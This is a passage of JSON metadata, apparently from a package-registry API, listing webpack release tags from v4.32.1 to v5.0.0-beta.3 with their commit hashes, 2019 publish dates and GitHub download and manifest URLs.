/v5.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3/manifests"},{"name":"v5.0.0-beta.2","sha":"b3e42f3d67df70d5d7cadb47efa2078b97a01ab8","kind":"tag","published_at":"2019-10-31T07:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2/manifests"},{"name":"v5.0.0-beta.1","sha":"4940cb1536967ecfafb4267b2e912ef376481896","kind":"tag","published_at":"2019-10-22T15:56:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1/manifests"},{"name":"v4.41.2","sha":"11e94dd2d0a8d8baae75e715ff8a69f27a9e3014","kind":"tag","published_at":"2019-10-15T13:01:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2/manifests"},{"name":"v5.0.0-beta.0","sha":"1bd85218c0e5adc54f381a63e4187e5fe435a81f","kind":"tag","published_at":"2019-10-11T12:58:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0/manifests"},{"name":"v5.0.0-alpha.32","sha":"8a73bc411b470f5d211053c99efbc1569d630f1b","kind":"tag","published_at":"2019-10-11T12:55:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32/manifests"},{"name":"v4.41.1","sha":"dcfda0061cef24d68312216893da0b38f4a670f9","kind":"tag","published_at":"2019-10-11T11:42:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1/manifests"},{"name":"v5.0.0-alpha.31","sha":"2bebf88509441835b71af9904e574ea6303642b7","kind":"tag","published_at":"2019-10-10T20:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31/manifests"},{"name":"v5.0.0-alpha.30","sha":"05a01f3c281fec762c392ae1516ab32cc564859d","kind":"tag","published_at":"2019-10-07T14:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30/manifests"},{"name":"v5.0.0-alpha.29","sha":"6709efb409383aae3c7821c1eea85de107f777b7","kind":"tag","published_at":"2019-10-02T06:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29/manifests"},{"name":"v5.0.0-alpha.28","sha":"5aeef4793592113fe354a2f7f4a56dcb2c253dbe","kind":"tag","published_at":"2019-09-26T21:04:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28/manifests"},{"name":"v5.0.0-alpha.27","sha":"b9ffbbaec3f6f5da2cab010baa928bbc545db918","kind":"tag","published_at":"2019-09-25T22:48:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27/manifests"},{"name":"v4.41.0","sha":"36e318b75c62f4f4a95597e75ecf09d92069f3c4","kind":"tag","published_at":"2019-09-24T15:45:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0/manifests"},{"name":"v4.40.3","sha":"b58560cf5cafdfe47a3ac3424a3d6ee95954759b","kind":"tag","published_at":"2019-09-24T15:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3/manifests"},{"name":"v4.40.2","sha":"d1fffd8bbeb024d1452a7f7a33a4c0c87604d8ec","kind":"tag","published_at":"2019-09-13T14:29:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2/manifests"},{"name":"v4.40.1","sha":"e4c7d8c0ae0c93306f07920bc28fe72119bc098a","kind":"tag","published_at":"2019-09-13T07:07:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1/manifests"},{"name":"v4.40.0","sha":"9c6b36787fe43581d6c568e64b71656274c04881","kind":"tag","published_at":"2019-09-12T18:52:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0/manifests"},{"name":"v5.0.0-alpha.26","sha":"77ef20c1e3e57149053588785f69a69a41f542fc","kind":"tag","published_at":"2019-09-08T20:58:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26/manifests"},{"name":"v5.0.0-alpha.25","sha":"332a14596af7a5792b7b041aeb0cd7544a509c37","kind":"tag","published_at":"2019-09-06T13:37:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25/manifests"},{"name":"v5.0.0-alpha.24","sha":"7c7c96d18c410f6cd4bf15db26650309661c75ea","kind":"tag","published_at":"2019-09-05T12:13:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24/manifests"},{"name":"v5.0.0-alpha.23","sha":"4a88ea6de08677d4538201605408b42bdaa9c8c7","kind":"tag","published_at":"2019-08-27T17:17:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23/manifests"},{"name":"v4.39.3","sha":"94929a59a79bc79cab789804d5592c3ec0605cc4","kind":"tag","published_at":"2019-08-27T12:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3/manifests"},{"name":"v5.0.0-alpha.22","sha":"4bd900e790611f32431d46ec4af559bc90d267ff","kind":"tag","published_at":"2019-08-23T13:16:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22/manifests"},{"name":"v5.0.0-alpha.21","sha":"2a7f242968c2597fb9b955645fe7f4b57b61d62e","kind":"tag","published_at":"2019-08-22T19:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21/manifests"},{"name":"v5.0.0-alpha.20","sha":"8e1ea8385d10c13c15c79eb9c4146e071ef8d565","kind":"tag","published_at":"2019-08-14T08:21:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20/manifests"},{"name":"v4.39.2","sha":"7265427acf9cd4f0f36f05c1ba16a0abedb7bbc1","kind":"tag","published_at":"2019-08-13T17:45:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2/manifests"},{"name":"v5.0.0-alpha.19","sha":"1aefa1116b7d54e445e606aa4cffb3a4ec82cd7a","kind":"tag","published_at":"2019-08-06T14:37:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19/manifests"},{"name":"v4.39.1","sha":"f29445d46624ef4726465e27bbe6e003aa07f8be","kind":"tag","published_at":"2019-08-02T12:35:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1/manifests"},{"name":"v4.39.0","sha":"5344837ed67479b838ad07ff353919d41f5d2b9f","kind":"tag","published_at":"2019-08-01T15:30:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0/manifests"},{"name":"v4.38.0","sha":"ae3db13d7db6dbcdc27f2f3095b532c60c9de1c9","kind":"tag","published_at":"2019-07-26T07:26:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0/manifests"},{"name":"v4.37.0","sha":"04b0d6b4eaa0e18629998e28f795914291c34723","kind":"tag","published_at":"2019-07-23T09:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0/manifests"},{"name":"v4.36.1","sha":"92caa5de066ded4232a119752bd5dde1497606ef","kind":"tag","published_at":"2019-07-17T13:58:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1/manifests"},{"name":"v4.36.0","sha":"95d21bb39a1e700f28be776b300492c50a169fc7","kind":"tag","published_at":"2019-07-17T11:32:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0/manifests"},{"name":"v5.0.0-alpha.18","sha":"9d05b680f02b7bdae81eff47a18f95d1f21ed053","kind":"tag","published_at":"2019-07-08T20:25:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18/manifests"},{"name":"v4.35.3","sha":"4ec90ceba4206aeb91d4c0f7e12dc889d238001e","kind":"tag","published_at":"2019-07-08T13:53:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3/manifests"},{"name":"v5.0.0-alpha.17","sha":"7ade38d01107be2f55277b61fb683341884cdc7c","kind":"tag","published_at":"2019-07-01T10:22:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17/manifests"},{"name":"v4.35.2","sha":"bf3e869a423a60581dcb64e215b8d14403e997f2","kind":"tag","published_at":"2019-07-01T09:18:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2/manifests"},{"name":"v4.35.1","sha":"569dd6a2d2e31f218578c79a4b25dfe61baf6c08","kind":"tag","published_at":"2019-07-01T09:07:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1/manifests"},{"name":"v4.35.0","sha":"c3377ef76ec708ed9c55314e8386f438abea178c","kind":"tag","published_at":"2019-06-19T19:15:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0/manifests"},{"name":"v5.0.0-alpha.16","sha":"56b8aa7006df3c7c9d6634dd11fc6a9f5bac9644","kind":"tag","published_at":"2019-06-14T13:25:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16/manifests"},{"name":"v4.34.0","sha":"34c86675728430c0f41fe415dbbacf87b5a2875d","kind":"tag","published_at":"2019-06-12T23:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0/manifests"},{"name":"v5.0.0-alpha.15","sha":"224daec09d68f17ef705eafc9ecafeb3fa7fd7a9","kind":"tag","published_at":"2019-06-05T16:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15/manifests"},{"name":"v4.33.0","sha":"d45bec3518f53153287ff2cad3cfae9d2b248d9a","kind":"tag","published_at":"2019-06-04T19:32:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0/manifests"},{"name":"v5.0.0-alpha.14","sha":"0037e7355a147cf0fe8df9c56f1b9515b1a87f88","kind":"tag","published_at":"2019-05-23T07:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14/manifests"},{"name":"v4.32.2","sha":"5d3004cccd3dd5af2721c39a7a8a27b12b3d0c19","kind":"tag","published_at":"2019-05-22T23:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2/manifests"},{"name":"v4.32.1","sha":"87fc33edbec46f721a2186194f2bc0c8fc14b464","kind":"tag","published_at":"2019-05-22T06:30: